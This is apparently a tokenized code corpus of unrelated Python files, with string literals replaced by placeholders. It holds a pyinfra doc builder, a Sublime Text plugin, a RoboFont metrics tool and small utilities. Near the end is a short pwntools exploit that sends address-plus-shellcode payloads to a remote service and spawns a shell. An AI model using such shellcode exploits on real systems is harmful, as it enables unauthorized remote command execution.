<s> import re <EOL> from types import FunctionType <EOL> from importlib import import_module <EOL> from inspect import getmembers , getargspec <EOL> from pyinfra import modules <EOL> def _title_line ( char , string ) : <EOL> return '<STR_LIT>' . join ( char for _ in xrange ( <NUM_LIT:0> , len ( string ) ) ) <EOL> def _format_doc_line ( line ) : <EOL> line = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , line ) <EOL> return line [ <NUM_LIT:4> : ] <EOL> def build_facts ( ) : <EOL> for module_name in modules . __all__ : <EOL> lines = [ ] <EOL> print '<STR_LIT>' . format ( module_name ) <EOL> module = import_module ( '<STR_LIT>' . format ( module_name ) ) <EOL> lines . append ( module_name . title ( ) ) <EOL> lines . append ( _title_line ( '<STR_LIT:->' , module_name ) ) <EOL> lines . append ( '<STR_LIT>' ) <EOL> if module . __doc__ : <EOL> lines . append ( module . __doc__ ) <EOL> operation_functions = [ <EOL> ( key , value . _pyinfra_op ) <EOL> for key , value in getmembers ( module ) <EOL> if ( <EOL> isinstance ( value , FunctionType ) <EOL> and value . __module__ == module . __name__ <EOL> and getattr ( value , '<STR_LIT>' , False ) <EOL> and not value . __name__ . startswith ( '<STR_LIT:_>' ) <EOL> ) <EOL> ] <EOL> for name , func in operation_functions : <EOL> title_name = '<STR_LIT>' . format ( module_name , name ) <EOL> lines . append ( title_name ) <EOL> lines . append ( _title_line ( '<STR_LIT>' , title_name ) ) <EOL> doc = func . __doc__ <EOL> if doc : <EOL> docbits = doc . strip ( ) . split ( '<STR_LIT:\n>' ) <EOL> description_lines = [ ] <EOL> for line in docbits : <EOL> if line : <EOL> description_lines . append ( line ) <EOL> else : <EOL> break <EOL> if len ( docbits ) > <NUM_LIT:0> : <EOL> lines . append ( '<STR_LIT>' ) <EOL> lines . extend ( [ line . strip ( ) for line in description_lines ] ) <EOL> lines . append ( '<STR_LIT>' ) <EOL> doc = '<STR_LIT:\n>' . join ( docbits [ len ( description_lines ) : ] ) <EOL> argspec = getargspec ( func ) <EOL> arg_defaults = [ <EOL> "<STR_LIT>" . format ( arg ) if isinstance ( arg , str ) else arg <EOL> for arg in argspec . defaults <EOL> ] if argspec . defaults else None <EOL> defaults = dict ( zip ( <EOL> argspec . args [ - len ( arg_defaults ) : ] , <EOL> arg_defaults <EOL> ) ) if arg_defaults else { } <EOL> args = [ <EOL> '<STR_LIT>' . format ( arg , defaults [ arg ] ) <EOL> if arg in defaults else arg <EOL> for arg in argspec . args [ <NUM_LIT:2> : ] <EOL> ] <EOL> arg_count = len ( args ) <EOL> if arg_count < <NUM_LIT:7> : <EOL> args_string = '<STR_LIT:U+002CU+0020>' . join ( args ) <EOL> else : <EOL> top_args = args [ : arg_count / <NUM_LIT:2> ] <EOL> bottom_args = args [ arg_count / <NUM_LIT:2> : ] <EOL> args_string = '''<STR_LIT>''' . format ( <EOL> '<STR_LIT:U+002CU+0020>' . join ( top_args ) , <EOL> '<STR_LIT:U+002CU+0020>' . join ( bottom_args ) <EOL> ) <EOL> lines . append ( '''<STR_LIT>''' . strip ( ) . format ( module_name , name , args_string ) ) <EOL> if doc : <EOL> lines . append ( '<STR_LIT>' ) <EOL> lines . append ( '<STR_LIT>' . format ( '<STR_LIT:\n>' . join ( [ <EOL> _format_doc_line ( line ) for line in doc . split ( '<STR_LIT:\n>' ) <EOL> ] ) ) . strip ( ) ) <EOL> lines . append ( '<STR_LIT>' ) <EOL> lines . append ( '<STR_LIT>' ) <EOL> module_filename = '<STR_LIT>' . format ( module_name ) <EOL> print '<STR_LIT>' . format ( module_filename ) <EOL> out = '<STR_LIT:\n>' . join ( lines ) <EOL> outfile = open ( module_filename , '<STR_LIT:w>' ) <EOL> outfile . write ( out ) <EOL> outfile . close ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> print '<STR_LIT>' <EOL> build_facts ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import spf <EOL> import sys <EOL> def main ( ) : <EOL> if len ( sys . argv ) != <NUM_LIT:4> : <EOL> print ( '<STR_LIT:[>' + os . path . basename ( __file__ ) + '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:64> ) <EOL> result , explanation = spf . check2 ( sys . argv [ <NUM_LIT:1> ] , sys . argv [ <NUM_LIT:2> ] , sys . argv [ <NUM_LIT:3> ] ) <EOL> print ( '<STR_LIT:[>' + os . path . basename ( __file__ ) + '<STR_LIT>' + result + '<STR_LIT:U+002CU+0020>' + explanation + '<STR_LIT:)>' ) <EOL> if result == '<STR_LIT>' : <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> else : <EOL> sys . exit ( <NUM_LIT:11> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import os <EOL> import time <EOL> import hashlib <EOL> import collections <EOL> import sublime_plugin <EOL> try : <EOL> from . common import msg , shared as G , utils <EOL> from . sublime_utils import get_buf , get_text <EOL> assert G and G and utils and msg and get_buf and get_text <EOL> except ImportError : <EOL> from common import msg , shared as G , utils <EOL> from sublime_utils import get_buf , get_text <EOL> def if_connected ( f ) : <EOL> def wrapped ( * args ) : <EOL> if not G . AGENT or not G . AGENT . is_ready ( ) : <EOL> return <EOL> args = list ( args ) <EOL> args . append ( G . AGENT ) <EOL> return f ( * args ) <EOL> return wrapped <EOL> def is_view_loaded ( view ) : <EOL> """<STR_LIT>""" <EOL> if not G . AGENT : <EOL> return <EOL> if not G . AGENT . joined_workspace : <EOL> return <EOL> if view . is_loading ( ) : <EOL> return <EOL> buf = get_buf ( view ) <EOL> if not buf or buf . get ( '<STR_LIT>' ) is None : <EOL> return <EOL> return buf <EOL> class Listener ( sublime_plugin . EventListener ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> sublime_plugin . EventListener . __init__ ( self , * args , ** kwargs ) <EOL> self . _highlights = set ( ) <EOL> self . _view_selections = { } <EOL> self . between_save_events = collections . defaultdict ( lambda : [ <NUM_LIT:0> , '<STR_LIT>' ] ) <EOL> self . disable_follow_mode_timeout = None <EOL> @ if_connected <EOL> def on_post_window_command ( self , window , command , * args , ** kwargs ) : <EOL> agent = args [ - <NUM_LIT:1> ] <EOL> if command == '<STR_LIT>' : <EOL> files = args [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> for f in files : <EOL> buf = agent . get_buf_by_path ( f ) <EOL> if not buf : <EOL> continue <EOL> if os . path . exists ( f ) : <EOL> continue <EOL> agent . send ( { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : buf [ '<STR_LIT:id>' ] , <EOL> } ) <EOL> return <EOL> if command == '<STR_LIT>' : <EOL> dirs = args [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> for d in dirs : <EOL> if os . path . isdir ( d ) : <EOL> continue <EOL> rel_path = utils . to_rel_path ( d ) <EOL> if not rel_path : <EOL> msg . error ( '<STR_LIT>' , d ) <EOL> continue <EOL> for buf_id , buf in G . AGENT . bufs . items ( ) : <EOL> if buf [ '<STR_LIT:path>' ] . startswith ( rel_path ) : <EOL> agent . send ( { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : buf_id , <EOL> } ) <EOL> @ if_connected <EOL> def on_window_command ( self , window , command , * args , ** kwargs ) : <EOL> if command == '<STR_LIT>' : <EOL> msg . debug ( '<STR_LIT>' ) <EOL> if window == G . WORKSPACE_WINDOW and command == '<STR_LIT>' : <EOL> msg . log ( '<STR_LIT>' ) <EOL> try : <EOL> window . run_command ( '<STR_LIT>' ) <EOL> except Exception as e : <EOL> msg . error ( e ) <EOL> def name ( self , view ) : <EOL> return view . file_name ( ) <EOL> def on_new ( self , view ) : <EOL> msg . debug ( '<STR_LIT>' , self . name ( view ) ) <EOL> @ if_connected <EOL> def reenable_follow_mode ( self , agent ) : <EOL> agent . temp_disable_follow = False <EOL> self . disable_follow_mode_timeout = None <EOL> @ if_connected <EOL> def disable_follow_mode ( self , timeout , agent ) : <EOL> if G . FOLLOW_MODE is True : <EOL> agent . temp_disable_follow = True <EOL> utils . cancel_timeout ( self . disable_follow_mode_timeout ) <EOL> self . disable_follow_mode_timeout = utils . set_timeout ( self . reenable_follow_mode , timeout ) <EOL> @ if_connected <EOL> def on_clone ( self , view , agent ) : <EOL> msg . debug ( '<STR_LIT>' , self . name ( view ) ) <EOL> buf = get_buf ( view ) <EOL> if not buf : <EOL> return <EOL> buf_id = int ( buf [ '<STR_LIT:id>' ] ) <EOL> f = agent . on_clone . get ( buf_id ) <EOL> if not f : <EOL> return <EOL> del agent . on_clone [ buf_id ] <EOL> f ( buf , view ) <EOL> @ if_connected <EOL> def on_close ( self , view , agent ) : <EOL> msg . debug ( '<STR_LIT>' , self . name ( view ) ) <EOL> @ if_connected <EOL> def on_load ( self , view , agent ) : <EOL> msg . debug ( '<STR_LIT>' , self . name ( view ) ) <EOL> buf = get_buf ( view ) <EOL> if not buf : <EOL> return <EOL> buf_id = int ( buf [ '<STR_LIT:id>' ] ) <EOL> d = agent . on_load . get ( buf_id ) <EOL> if not d : <EOL> return <EOL> del agent . on_load [ buf_id ] <EOL> utils . set_timeout ( lambda : [ f ( ) for ( _ , f ) in d . items ( ) ] , <NUM_LIT:0> ) <EOL> @ if_connected <EOL> def on_pre_save ( self , view , agent ) : <EOL> if view . is_scratch ( ) : <EOL> return <EOL> p = view . name ( ) <EOL> if view . file_name ( ) : <EOL> try : <EOL> p = utils . to_rel_path ( view . file_name ( ) ) <EOL> except ValueError : <EOL> p = view . file_name ( ) <EOL> i = self . between_save_events [ view . buffer_id ( ) ] <EOL> i [ <NUM_LIT:0> ] += <NUM_LIT:1> <EOL> i [ <NUM_LIT:1> ] = p <EOL> @ if_connected <EOL> def on_post_save ( self , view , agent ) : <EOL> view_buf_id = view . buffer_id ( ) <EOL> def cleanup ( ) : <EOL> i = self . between_save_events [ view_buf_id ] <EOL> i [ <NUM_LIT:0> ] -= <NUM_LIT:1> <EOL> if view . is_scratch ( ) : <EOL> return <EOL> i = self . between_save_events [ view_buf_id ] <EOL> if agent . ignored_saves [ view_buf_id ] > <NUM_LIT:0> : <EOL> agent . ignored_saves [ view_buf_id ] -= <NUM_LIT:1> <EOL> return cleanup ( ) <EOL> old_name = i [ <NUM_LIT:1> ] <EOL> i = self . between_save_events [ view_buf_id ] <EOL> if i [ <NUM_LIT:0> ] > <NUM_LIT:1> : <EOL> return cleanup ( ) <EOL> old_name = i [ <NUM_LIT:1> ] <EOL> event = None <EOL> buf = get_buf ( view ) <EOL> try : <EOL> name = utils . to_rel_path ( view . file_name ( ) ) <EOL> except ValueError : <EOL> name = view . file_name ( ) <EOL> is_shared = utils . is_shared ( view . file_name ( ) ) <EOL> if buf is None : <EOL> if not is_shared : <EOL> return cleanup ( ) <EOL> if G . IGNORE and G . IGNORE . is_ignored ( view . file_name ( ) , log = True ) : <EOL> msg . log ( view . file_name ( ) , '<STR_LIT>' ) <EOL> return cleanup ( ) <EOL> msg . log ( '<STR_LIT>' , name , '<STR_LIT:U+0020>' , view . file_name ( ) ) <EOL> event = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : get_text ( view ) , <EOL> '<STR_LIT:path>' : name <EOL> } <EOL> elif name != old_name : <EOL> if is_shared : <EOL> msg . log ( '<STR_LIT>' , old_name , '<STR_LIT>' , name ) <EOL> event = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : buf [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT:path>' : name <EOL> } <EOL> else : <EOL> msg . log ( '<STR_LIT>' , name ) <EOL> event = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : buf [ '<STR_LIT:id>' ] , <EOL> } <EOL> if event : <EOL> agent . send ( event ) <EOL> if is_shared and buf : <EOL> agent . views_changed . append ( ( '<STR_LIT>' , view , buf ) ) <EOL> cleanup ( ) <EOL> @ if_connected <EOL> def on_modified ( self , view , agent ) : <EOL> buf = is_view_loaded ( view ) <EOL> if not buf : <EOL> return <EOL> text = get_text ( view ) <EOL> if buf [ '<STR_LIT>' ] != '<STR_LIT:utf8>' : <EOL> return msg . warn ( '<STR_LIT>' ) <EOL> text = text . encode ( '<STR_LIT:utf-8>' ) <EOL> view_md5 = hashlib . md5 ( text ) . hexdigest ( ) <EOL> bid = view . buffer_id ( ) <EOL> buf [ '<STR_LIT>' ] = False <EOL> if view_md5 == G . VIEW_TO_HASH . get ( bid ) : <EOL> self . _highlights . add ( bid ) <EOL> return <EOL> G . VIEW_TO_HASH [ view . buffer_id ( ) ] = view_md5 <EOL> msg . debug ( '<STR_LIT>' , buf [ '<STR_LIT:path>' ] , '<STR_LIT>' , buf [ '<STR_LIT:id>' ] ) <EOL> self . disable_follow_mode ( <NUM_LIT> ) <EOL> agent . views_changed . append ( ( '<STR_LIT>' , view , buf ) ) <EOL> @ if_connected <EOL> def on_selection_modified ( self , view , agent , buf = None ) : <EOL> buf = is_view_loaded ( view ) <EOL> if not buf or '<STR_LIT>' not in G . PERMS : <EOL> return <EOL> c = [ [ x . a , x . b ] for x in view . sel ( ) ] <EOL> bid = view . buffer_id ( ) <EOL> previous = self . _view_selections . get ( bid , { } ) <EOL> now = time . time ( ) <EOL> if previous . get ( "<STR_LIT>" ) == c : <EOL> t = previous . get ( "<STR_LIT:time>" , <NUM_LIT:0> ) <EOL> if now - t < <NUM_LIT:1> : <EOL> return <EOL> previous [ '<STR_LIT:time>' ] = now <EOL> previous [ '<STR_LIT>' ] = c <EOL> self . _view_selections [ bid ] = previous <EOL> discard = bid in self . _highlights <EOL> if discard : <EOL> self . _highlights . discard ( bid ) <EOL> if agent . joined_workspace : <EOL> agent . send ( { <EOL> '<STR_LIT:id>' : buf [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : c , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : discard , <EOL> } ) <EOL> @ if_connected <EOL> def on_activated ( self , view , agent ) : <EOL> buf = get_buf ( view ) <EOL> if buf : <EOL> msg . debug ( '<STR_LIT>' , buf [ '<STR_LIT:path>' ] , '<STR_LIT>' , buf [ '<STR_LIT:id>' ] ) <EOL> self . on_modified ( view ) <EOL> self . on_selection_modified ( view ) </s>
<s> from vanilla import * <EOL> from defconAppKit . windows . baseWindow import BaseWindowController <EOL> from AppKit import * <EOL> import os . path <EOL> def sortFonts ( fonts ) : <EOL> """<STR_LIT>""" <EOL> return fonts <EOL> """<STR_LIT>""" <EOL> def addMargins ( f , gnames = [ ] , leftUnits = <NUM_LIT:0> , rightUnits = <NUM_LIT:0> , adjustComponents = True ) : <EOL> for gname in gnames : <EOL> if f . has_key ( gname ) : <EOL> g = f [ gname ] <EOL> g . prepareUndo ( '<STR_LIT>' ) <EOL> if leftUnits != <NUM_LIT:0> : <EOL> if g . box : <EOL> g . leftMargin += leftUnits <EOL> else : <EOL> g . width += leftUnits <EOL> if adjustComponents : <EOL> for comp in g . components : <EOL> if comp . baseGlyph in gnames : <EOL> comp . offset = ( comp . offset [ <NUM_LIT:0> ] - leftUnits , comp . offset [ <NUM_LIT:1> ] ) <EOL> if rightUnits != <NUM_LIT:0> : <EOL> if g . box : <EOL> g . rightMargin += rightUnits <EOL> else : <EOL> g . width += rightUnits <EOL> g . performUndo ( ) <EOL> def multiplyMargins ( f , gnames , leftMultiplier = <NUM_LIT:1> , rightMultiplier = <NUM_LIT:1> , roundValues = <NUM_LIT:1> , adjustComponents = True ) : <EOL> marginRecords = { } <EOL> for gname in gnames : <EOL> leftUnits , rightUnits = <NUM_LIT:0> , <NUM_LIT:0> <EOL> if f . has_key ( gname ) : <EOL> g = f [ gname ] <EOL> if leftMultiplier != <NUM_LIT:1> : <EOL> leftUnits = ( leftMultiplier * g . leftMargin ) - g . leftMargin <EOL> if rightMultiplier != <NUM_LIT:1> : <EOL> rightUnits = ( rightMultiplier * g . rightMargin ) - g . rightMargin <EOL> if roundValues != <NUM_LIT:0> : <EOL> leftUnits = round ( leftUnits , roundValues ) <EOL> rightUnits = round ( rightUnits , roundValues ) <EOL> marginRecords [ g . name ] = leftUnits , rightUnits <EOL> for gname in gnames : <EOL> if f . has_key ( gname ) : <EOL> g = f [ gname ] <EOL> g . prepareUndo ( '<STR_LIT>' ) <EOL> leftUnits , rightUnits = marginRecords [ gname ] <EOL> g . leftMargin += leftUnits <EOL> g . rightMargin += rightUnits <EOL> if adjustComponents : <EOL> for comp in g . components : <EOL> if comp . baseGlyph in gnames : <EOL> compLeftUnits , compRightUnits = marginRecords [ comp . baseGlyph ] <EOL> comp . offset = ( comp . offset [ <NUM_LIT:0> ] - compLeftUnits , comp . offset [ <NUM_LIT:1> ] ) <EOL> g . performUndo ( ) <EOL> class AdjustMetrics ( BaseWindowController ) : <EOL> WINDOWTITLE = u'<STR_LIT>' <EOL> def __init__ ( self ) : <EOL> width = <NUM_LIT> <EOL> height = <NUM_LIT> <EOL> x = <NUM_LIT:20> <EOL> y = <NUM_LIT:20> <EOL> rightMargin = - <NUM_LIT:20> <EOL> itemHeight = <NUM_LIT> <EOL> lineHeight = <NUM_LIT> <EOL> fonts = AllFonts ( ) <EOL> self . fonts = sortFonts ( fonts ) <EOL> current = CurrentFont ( ) <EOL> self . w = Window ( ( width , height ) , self . WINDOWTITLE , autosaveName = self . WINDOWTITLE , minSize = ( width , height ) ) <EOL> self . w . adjustBothText = TextBox ( ( x , y , rightMargin , itemHeight ) , '<STR_LIT>' ) <EOL> y += lineHeight <EOL> self . w . adjustBothValue = EditText ( ( x , y , <NUM_LIT:50> , itemHeight ) , callback = self . adjustBothValueCallback ) <EOL> x += <NUM_LIT> <EOL> self . w . adjustBothUnit = RadioGroup ( ( x , y , <NUM_LIT> , itemHeight * <NUM_LIT:2> ) , [ '<STR_LIT>' , '<STR_LIT>' ] , callback = self . adjustBothUnitCallback ) <EOL> self . w . adjustBothUnit . set ( <NUM_LIT:0> ) <EOL> x = <NUM_LIT:20> <EOL> y += lineHeight * <NUM_LIT> <EOL> self . w . adjustLeftText = TextBox ( ( x , y , rightMargin , itemHeight ) , '<STR_LIT>' ) <EOL> y += lineHeight <EOL> self . w . adjustLeftValue = EditText ( ( x , y , <NUM_LIT:50> , itemHeight ) , callback = self . clearBothCallback ) <EOL> x += <NUM_LIT> <EOL> self . w . adjustLeftUnit = RadioGroup ( ( x , y , <NUM_LIT> , itemHeight * <NUM_LIT:2> ) , [ '<STR_LIT>' , '<STR_LIT>' ] , callback = self . clearBothCallback ) <EOL> self . w . adjustLeftUnit . set ( <NUM_LIT:0> ) <EOL> x = <NUM_LIT:20> <EOL> y += lineHeight * <NUM_LIT> <EOL> self . w . adjustRightText = TextBox ( ( x , y , rightMargin , itemHeight ) , '<STR_LIT>' ) <EOL> y += lineHeight <EOL> self . w . adjustRightValue = EditText ( ( x , y , <NUM_LIT:50> , itemHeight ) , callback = self . clearBothCallback ) <EOL> x += <NUM_LIT> <EOL> self . w . adjustRightUnit = RadioGroup ( ( x , y - <NUM_LIT:3> , <NUM_LIT> , itemHeight * <NUM_LIT:2> ) , [ '<STR_LIT>' , '<STR_LIT>' ] , callback = self . clearBothCallback ) <EOL> self . w . adjustRightUnit . set ( <NUM_LIT:0> ) <EOL> x = <NUM_LIT:20> <EOL> y += lineHeight * <NUM_LIT> <EOL> self . w . glyphSelection = RadioGroup ( ( x , y , rightMargin , itemHeight * <NUM_LIT:2> ) , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . w . glyphSelection . set ( <NUM_LIT:0> ) <EOL> y += lineHeight * <NUM_LIT> <EOL> self . w . adjustComponents = CheckBox ( ( x , y , rightMargin , itemHeight ) , '<STR_LIT>' ) <EOL> self . w . adjustComponents . set ( <NUM_LIT:1> ) <EOL> y += lineHeight <EOL> self . w . adjustBaseComponents = CheckBox ( ( x , y , rightMargin , itemHeight ) , '<STR_LIT>' ) <EOL> self . w . adjustBaseComponents . set ( <NUM_LIT:0> ) <EOL> y += lineHeight <EOL> self . w . ignoreZeroWidth = CheckBox ( ( x , y , rightMargin , itemHeight ) , '<STR_LIT>' ) <EOL> self . w . ignoreZeroWidth . set ( <NUM_LIT:1> ) <EOL> self . w . apply = Button ( ( x , - <NUM_LIT> , <NUM_LIT:100> , itemHeight ) , '<STR_LIT>' , callback = self . apply ) <EOL> self . w . cancel = Button ( ( x + <NUM_LIT> , - <NUM_LIT> , <NUM_LIT:100> , itemHeight ) , '<STR_LIT>' , callback = self . cancel ) <EOL> self . fs = Drawer ( ( <NUM_LIT:200> , <NUM_LIT> ) , self . w ) <EOL> fsx = <NUM_LIT:5> <EOL> fsy = <NUM_LIT:5> <EOL> self . fs . selectAllFonts = Button ( ( fsx , fsy , - <NUM_LIT> , itemHeight ) , '<STR_LIT>' , callback = self . selectAllFonts , sizeStyle = '<STR_LIT>' ) <EOL> self . fs . refreshFontList = Button ( ( - <NUM_LIT> , fsy , <NUM_LIT:30> , <NUM_LIT> ) , unichr ( <NUM_LIT> ) , callback = self . refreshFontList ) <EOL> fsy += <NUM_LIT> <EOL> self . fs . deselectAllFonts = Button ( ( fsx , fsy , - <NUM_LIT> , itemHeight ) , '<STR_LIT>' , callback = self . deselectAllFonts , sizeStyle = '<STR_LIT>' ) <EOL> fsy += <NUM_LIT> <EOL> self . fs . selectCurrentFont = Button ( ( fsx , fsy , - <NUM_LIT> , itemHeight ) , '<STR_LIT>' , callback = self . selectCurrentFont , sizeStyle = '<STR_LIT>' ) <EOL> fsy += <NUM_LIT> <EOL> fontNameList = [ ] <EOL> currentIndex = None <EOL> for x , f in enumerate ( self . fonts ) : <EOL> fontName = str ( f . info . familyName ) + '<STR_LIT:U+0020>' + str ( f . info . styleName ) <EOL> if fontName in fontNameList : <EOL> fontName = f . path <EOL> fontNameList . append ( fontName ) <EOL> if f == CurrentFont ( ) : <EOL> currentIndex = x <EOL> fsy += <NUM_LIT:5> <EOL> self . fs . fontSelect = List ( ( fsx , fsy , - <NUM_LIT:5> , - <NUM_LIT:5> ) , fontNameList ) <EOL> if currentIndex is not None : <EOL> self . fs . fontSelect . setSelection ( [ currentIndex ] ) <EOL> self . w . open ( ) <EOL> self . fs . open ( ) <EOL> def refreshFontList ( self , sender ) : <EOL> self . fonts = sortFonts ( AllFonts ( ) ) <EOL> fontNameList = [ ] <EOL> currentIndex = None <EOL> for x , f in enumerate ( self . fonts ) : <EOL> fontName = str ( f . info . familyName ) + '<STR_LIT:U+0020>' + str ( f . info . styleName ) <EOL> if fontName in fontNameList : <EOL> fontName = f . path <EOL> fontNameList . append ( fontName ) <EOL> if f == CurrentFont ( ) : <EOL> currentIndex = x <EOL> self . fs . fontSelect . set ( fontNameList ) <EOL> self . fs . fontSelect . setSelection ( [ currentIndex ] ) <EOL> def adjustBothUnitCallback ( self , sender ) : <EOL> self . w . adjustLeftUnit . set ( sender . get ( ) ) <EOL> self . w . adjustRightUnit . set ( sender . get ( ) ) <EOL> def adjustBothValueCallback ( self , sender ) : <EOL> self . w . adjustLeftValue . set ( sender . get ( ) ) <EOL> self . w . adjustRightValue . set ( sender . get ( ) ) <EOL> def clearBothCallback ( self , sender ) : <EOL> self . w . adjustBothValue . set ( '<STR_LIT>' ) <EOL> def selectAllFonts ( self , sender ) : <EOL> indexRange = range ( <NUM_LIT:0> , len ( self . fonts ) ) <EOL> self . fs . fontSelect . setSelection ( indexRange ) <EOL> def deselectAllFonts ( self , sender ) : <EOL> self . fs . fontSelect . setSelection ( [ ] ) <EOL> def selectCurrentFont ( self , sender ) : <EOL> for x , f in enumerate ( self . fonts ) : <EOL> if f == CurrentFont ( ) : <EOL> currentIndex = x <EOL> self . fs . fontSelect . setSelection ( [ currentIndex ] ) <EOL> def getSelectedFonts ( self ) : <EOL> selectedFonts = [ ] <EOL> for index in self . fs . fontSelect . getSelection ( ) : <EOL> selectedFonts . append ( self . fonts [ index ] ) <EOL> return selectedFonts <EOL> def makeMetricsAdjustment ( self , f , gnames ) : <EOL> """<STR_LIT:U+0020>""" <EOL> if self . w . ignoreZeroWidth . get ( ) : <EOL> newGnames = [ ] <EOL> for gname in gnames : <EOL> if f [ gname ] . width != <NUM_LIT:0> : <EOL> newGnames . append ( gname ) <EOL> gnames = newGnames <EOL> if self . w . adjustComponents . get ( ) : <EOL> adjustComponents = True <EOL> else : <EOL> adjustComponents = False <EOL> adjustLeftUnit = self . w . adjustLeftUnit . get ( ) <EOL> adjustRightUnit = self . w . adjustRightUnit . get ( ) <EOL> try : <EOL> leftValue = int ( self . w . adjustLeftValue . get ( ) ) <EOL> except : <EOL> if adjustLeftUnit == <NUM_LIT:0> : <EOL> leftValue = <NUM_LIT:0> <EOL> else : <EOL> leftValue = <NUM_LIT:1> <EOL> try : <EOL> rightValue = int ( self . w . adjustRightValue . get ( ) ) <EOL> except : <EOL> if adjustRightUnit == <NUM_LIT:0> : <EOL> rightValue = <NUM_LIT:0> <EOL> else : <EOL> rightValue = <NUM_LIT:1> <EOL> if adjustLeftUnit == <NUM_LIT:0> : <EOL> if adjustRightUnit == <NUM_LIT:0> : <EOL> addMargins ( f , gnames , leftValue , rightValue , adjustComponents = adjustComponents ) <EOL> else : <EOL> addMargins ( f , gnames , leftValue , <NUM_LIT:0> , adjustComponents = adjustComponents ) <EOL> multiplyMargins ( f , gnames , <NUM_LIT:1> , rightValue * <NUM_LIT> , adjustComponents = adjustComponents ) <EOL> if adjustLeftUnit == <NUM_LIT:1> : <EOL> if adjustRightUnit == <NUM_LIT:1> : <EOL> multiplyMargins ( f , gnames , leftValue * <NUM_LIT> , rightValue * <NUM_LIT> , adjustComponents = adjustComponents ) <EOL> else : <EOL> multiplyMargins ( f , gnames , leftValue * <NUM_LIT> , <NUM_LIT:1> , adjustComponents = adjustComponents ) <EOL> addMargins ( f , gnames , <NUM_LIT:0> , rightValue , adjustComponents = adjustComponents ) <EOL> f . update ( ) <EOL> def apply ( self , sender ) : <EOL> fonts = self . getSelectedFonts ( ) <EOL> for f in fonts : <EOL> if self . w . glyphSelection . get ( ) == <NUM_LIT:0> : <EOL> gnames = CurrentFont ( ) . selection <EOL> else : <EOL> gnames = f . _object . keys ( ) <EOL> if self . w . adjustBaseComponents . get ( ) : <EOL> additionalGnames = [ ] <EOL> for g in f : <EOL> if len ( g . components ) >= <NUM_LIT:1> and ( g . components [ <NUM_LIT:0> ] . baseGlyph in gnames ) and ( g . name not in gnames ) : <EOL> additionalGnames . append ( g . name ) <EOL> gnames += additionalGnames <EOL> print f , gnames <EOL> self . makeMetricsAdjustment ( f , gnames ) <EOL> def cancel ( self , sender ) : <EOL> self . w . close ( ) <EOL> OpenWindow ( AdjustMetrics ) </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> import sys <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> test_suite = unittest . TestLoader ( ) . discover ( '<STR_LIT>' , pattern = '<STR_LIT>' ) <EOL> test_results = unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( test_suite ) <EOL> if not test_results . wasSuccessful ( ) : <EOL> sys . exit ( <NUM_LIT:1> ) </s>
<s> from setuptools import setup <EOL> setup ( name = "<STR_LIT>" , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> install_requires = [ '<STR_LIT>' ] <EOL> ) </s>
<s> from . config import config <EOL> __version__ = '<STR_LIT>' <EOL> def get_version ( ) : <EOL> return __version__ </s>
<s> from pwn import * <EOL> context ( os = '<STR_LIT>' , arch = '<STR_LIT>' ) <EOL> if '<STR_LIT>' in pwn . args : <EOL> HOST = pwn . args [ '<STR_LIT>' ] <EOL> PORT = int ( pwn . args . get ( '<STR_LIT>' , <NUM_LIT> ) ) <EOL> r = remote ( HOST , PORT ) <EOL> else : <EOL> r = process ( '<STR_LIT>' ) <EOL> r . clean ( <NUM_LIT:1> ) <EOL> r . sendline ( '<STR_LIT>' ) <EOL> r . clean ( <NUM_LIT:1> ) <EOL> buf = '<STR_LIT>' <EOL> buf += p32 ( <NUM_LIT> ) <EOL> buf += p32 ( <NUM_LIT> ) <EOL> buf += asm ( shellcraft . sh ( ) ) <EOL> log . info ( "<STR_LIT>" % hexdump ( buf ) ) <EOL> r . sendline ( buf ) <EOL> r . clean ( <NUM_LIT:1> ) <EOL> r . interactive ( ) </s>
<s> """<STR_LIT>""" <EOL> from pwn import * <EOL> shell = ssh ( host = '<STR_LIT>' , user = '<STR_LIT>' , password = '<STR_LIT>' ) <EOL> log . info ( "<STR_LIT>" % shell . whoami ( ) ) <EOL> log . info ( "<STR_LIT>" % shell . pwd ( ) ) <EOL> tube = shell . run ( '<STR_LIT>' ) <EOL> tube . send ( "<STR_LIT>" ) <EOL> tube . shutdown ( "<STR_LIT>" ) <EOL> print tube . recvall ( ) <EOL> shell . set_working_directory ( ) <EOL> log . info ( "<STR_LIT>" % shell . pwd ( ) ) <EOL> shell . upload_data ( """<STR_LIT>""" , '<STR_LIT>' ) <EOL> shell . gcc ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> print shell [ '<STR_LIT>' ] <EOL> print shell . echo ( "<STR_LIT>" ) <EOL> print shell . echo ( [ "<STR_LIT:list>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> print shell [ "<STR_LIT>" ] <EOL> shell . interactive ( ) </s>
